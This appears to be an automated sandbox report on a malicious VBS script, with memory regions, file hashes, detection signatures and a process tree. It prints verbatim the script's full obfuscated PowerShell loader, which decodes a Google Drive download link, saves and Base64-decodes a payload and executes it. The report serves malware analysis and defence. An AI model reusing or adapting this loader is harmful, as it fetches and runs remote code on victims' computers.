SHA512 60f118abae01336e9cf2be3020b17e1cee7b598889b5ffaed019a04bb33b805b7651938bcbf5bfebb7edc7589e733d37d756a57713da34d08b1c5a80a46715ad

memory/1104-288-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/276-289-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

memory/1104-290-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-291-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-292-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/276-293-0x0000000003010000-0x0000000003011000-memory.dmp

memory/276-294-0x00000000069D0000-0x000000000A678000-memory.dmp

memory/276-295-0x0000000077BE0000-0x0000000077D89000-memory.dmp

memory/276-296-0x0000000073C20000-0x00000000741CB000-memory.dmp

memory/276-298-0x0000000077DD0000-0x0000000077EA6000-memory.dmp

memory/276-297-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

memory/1860-299-0x0000000077BE0000-0x0000000077D89000-memory.dmp

memory/1860-300-0x0000000077E06000-0x0000000077E07000-memory.dmp

memory/1860-301-0x0000000077DD0000-0x0000000077EA6000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d8ee47325b962698fe53acb4209bf09e
SHA1 a505e201cecffee4372c9473b59b4e66a3ad9604
SHA256 6d56bb315c8f6e7193648bd5f355b2cd064e23c0fbbb1ab1a986dd79ef23d7ff
SHA512 084429cf07583b7808c9ee60ae11e7a56dd2c167d975de58c50c107090476afa91e7e1ac0773d721bd50a0078228f053a3e0bb8f785058e31985e0c16121eda2

C:\Users\Admin\AppData\Local\Temp\TarA0C3.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

memory/1860-323-0x0000000000420000-0x0000000001482000-memory.dmp

memory/1860-324-0x0000000077DD0000-0x0000000077EA6000-memory.dmp

memory/1860-325-0x0000000001490000-0x0000000005138000-memory.dmp

memory/1860-327-0x0000000077BE0000-0x0000000077D89000-memory.dmp

memory/1104-329-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1860-328-0x0000000077DD0000-0x0000000077EA6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-02 09:59

Reported

2024-04-02 10:01

Platform

win10v2004-20231215-en

Max time kernel

91s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4172 -ip 4172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 2464

Network

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fki0viq1.cuh.ps1
